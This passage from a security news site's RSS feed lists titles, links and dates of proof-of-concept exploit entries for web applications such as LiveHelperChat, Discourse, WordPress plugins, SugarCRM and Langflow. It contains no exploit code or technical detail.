<link>https://tsecurity.de/de/2899748/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-department-assignment-alias-nick-field/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2899748/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-department-assignment-alias-nick-field/</guid>
<pubDate>Tue, 22 Jul 2025 12:07:26 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field]]></title>
<description><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field]]></description>
<link>https://tsecurity.de/de/2899725/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-facebook-integration-page-name-field/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2899725/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-facebook-integration-page-name-field/</guid>
<pubDate>Tue, 22 Jul 2025 11:52:50 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Discourse 3.1.1 - Unauthenticated Chat Message Access]]></title>
<description><![CDATA[Discourse 3.1.1 - Unauthenticated Chat Message Access]]></description>
<link>https://tsecurity.de/de/2899724/poc/webapps-discourse-311-unauthenticated-chat-message-access/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2899724/poc/webapps-discourse-311-unauthenticated-chat-message-access/</guid>
<pubDate>Tue, 22 Jul 2025 11:52:48 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Discourse 3.1.1 - Unauthenticated Chat Message Access]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username]]></title>
<description><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username]]></description>
<link>https://tsecurity.de/de/2899723/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-telegram-bot-username/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2899723/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-telegram-bot-username/</guid>
<pubDate>Tue, 22 Jul 2025 11:52:47 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname]]></title>
<description><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname]]></description>
<link>https://tsecurity.de/de/2899722/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-operator-surname/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2899722/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-operator-surname/</guid>
<pubDate>Tue, 22 Jul 2025 11:52:46 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages]]></title>
<description><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages]]></description>
<link>https://tsecurity.de/de/2899721/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-personal-canned-messages/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2899721/poc/webapps-livehelperchat-461-stored-cross-site-scripting-xss-via-personal-canned-messages/</guid>
<pubDate>Tue, 22 Jul 2025 11:52:44 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE]]></title>
<description><![CDATA[Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE]]></description>
<link>https://tsecurity.de/de/2899662/poc/webapps-pie-register-wordpress-plugin-3714-authentication-bypass-to-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2899662/poc/webapps-pie-register-wordpress-plugin-3714-authentication-bypass-to-rce/</guid>
<pubDate>Tue, 22 Jul 2025 11:22:04 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Simple File List WordPress Plugin 4.2.2 - File Upload to RCE]]></title>
<description><![CDATA[Simple File List WordPress Plugin 4.2.2 - File Upload to RCE]]></description>
<link>https://tsecurity.de/de/2899661/poc/webapps-simple-file-list-wordpress-plugin-422-file-upload-to-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2899661/poc/webapps-simple-file-list-wordpress-plugin-422-file-upload-to-rce/</guid>
<pubDate>Tue, 22 Jul 2025 11:22:03 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Simple File List WordPress Plugin 4.2.2 - File Upload to RCE]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Joomla JS Jobs plugin 1.4.2 - SQL injection]]></title>
<description><![CDATA[Joomla JS Jobs plugin 1.4.2 - SQL injection]]></description>
<link>https://tsecurity.de/de/2899659/poc/webapps-joomla-js-jobs-plugin-142-sql-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2899659/poc/webapps-joomla-js-jobs-plugin-142-sql-injection/</guid>
<pubDate>Tue, 22 Jul 2025 11:22:00 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Joomla JS Jobs plugin 1.4.2 - SQL injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] WP Publications WordPress Plugin 1.2 - Stored XSS]]></title>
<description><![CDATA[WP Publications WordPress Plugin 1.2 - Stored XSS]]></description>
<link>https://tsecurity.de/de/2889460/poc/webapps-wp-publications-wordpress-plugin-12-stored-xss/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2889460/poc/webapps-wp-publications-wordpress-plugin-12-stored-xss/</guid>
<pubDate>Wed, 16 Jul 2025 10:52:14 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[WP Publications WordPress Plugin 1.2 - Stored XSS]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)]]></title>
<description><![CDATA[White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)]]></description>
<link>https://tsecurity.de/de/2889458/poc/webapps-white-star-software-protop-442-2024-11-27-local-file-inclusion-lfi/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2889458/poc/webapps-white-star-software-protop-442-2024-11-27-local-file-inclusion-lfi/</guid>
<pubDate>Wed, 16 Jul 2025 10:52:11 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[White Star Software Protop 4.4.2-2024-11-27 - Local File Inclusion (LFI)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] SugarCRM 14.0.0 - SSRF/Code Injection]]></title>
<description><![CDATA[SugarCRM 14.0.0 - SSRF/Code Injection]]></description>
<link>https://tsecurity.de/de/2889432/poc/webapps-sugarcrm-1400-ssrfcode-injection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2889432/poc/webapps-sugarcrm-1400-ssrfcode-injection/</guid>
<pubDate>Wed, 16 Jul 2025 10:38:18 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[SugarCRM 14.0.0 - SSRF/Code Injection]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Langflow 1.2.x - Remote Code Execution (RCE)]]></title>
<description><![CDATA[Langflow 1.2.x - Remote Code Execution (RCE)]]></description>
<link>https://tsecurity.de/de/2889404/poc/webapps-langflow-12x-remote-code-execution-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2889404/poc/webapps-langflow-12x-remote-code-execution-rce/</guid>
<pubDate>Wed, 16 Jul 2025 10:22:18 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Langflow 1.2.x - Remote Code Execution (RCE)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] PivotX 3.0.0 RC3 - Remote Code Execution (RCE)]]></title>
<description><![CDATA[PivotX 3.0.0 RC3 - Remote Code Execution (RCE)]]></description>
<link>https://tsecurity.de/de/2889357/poc/webapps-pivotx-300-rc3-remote-code-execution-rce/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2889357/poc/webapps-pivotx-300-rc3-remote-code-execution-rce/</guid>
<pubDate>Wed, 16 Jul 2025 09:51:51 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[PivotX 3.0.0 RC3 - Remote Code Execution (RCE)]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover]]></title>
<description><![CDATA[Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover]]></description>
<link>https://tsecurity.de/de/2874621/poc/webapps-stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2874621/poc/webapps-stacks-mobile-app-builder-523-authentication-bypass-via-account-takeover/</guid>
<pubDate>Tue, 08 Jul 2025 18:52:55 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Stacks Mobile App Builder 5.2.3 - Authentication Bypass via Account Takeover]]></content:encoded>
</item>
<item>
<title><![CDATA[[webapps] Discourse 3.2.x - Anonymous Cache Poisoning]]></title>
<description><![CDATA[Discourse 3.2.x - Anonymous Cache Poisoning]]></description>
<link>https://tsecurity.de/de/2874620/poc/webapps-discourse-32x-anonymous-cache-poisoning/</link>
<guid isPermaLink="true">https://tsecurity.de/de/2874620/poc/webapps-discourse-32x-anonymous-cache-poisoning/</guid>
<pubDate>Tue, 08 Jul 2025 18:52:54 +0200</pubDate>
<category>⚠️ PoC</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Discourse 3.2.x - Anonymous Cache Poisoning]]></content:encoded>
</item>
</channel>
</rss>
<!-- Generated in 0,11ms -->